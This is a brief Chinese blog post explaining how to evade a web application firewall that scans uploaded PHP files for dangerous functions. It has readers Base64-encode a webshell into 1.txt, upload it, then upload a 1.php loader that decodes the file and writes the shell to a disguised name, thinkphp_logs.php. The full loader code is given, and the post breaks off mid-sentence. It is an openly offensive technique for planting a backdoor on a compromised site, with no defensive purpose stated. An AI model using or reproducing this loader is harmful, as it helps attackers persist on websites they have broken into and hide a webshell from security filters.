突破网络过滤机制的一个高效传输方法
发布时间
阅读量:
阅读量
当我们访问某个网站的后台时,在兴奋地寻找是否有上传点的时候突然间注意到可以上传PHP文件。然而防火墙会根据文件内容进行检查,并且一旦检测到某些函数会被调用就会将上传的小马(指PHP脚本)删除掉。令人感到非常沮丧!
今天想简单记录一种绕过的方法:
具体步骤如下:首先编写一个简单的木马程序,在本地创建一个名为1.txt的文件,并对该木马代码进行Base64编码后保存至本地的1.txt文件中;接着将该文件传输至目标网站进行部署。
然后上传一个1.php,写入内容如下:
<?php
$path = "./";
$path = $path."1.txt";
echo $path;
//$fp = fopen("$path","r");
//$str = fread($fp,filesize($path));
$str = file_get_contents("$path","r");
$str = base64_decode($str);
echo $str;
$handle = fopen("./thinkphp_logs.php","w");
fwrite($handle,$str);
fclose($handle);
?>
按照这样的方式,在t
全部评论 (0)
还没有任何评论哟~
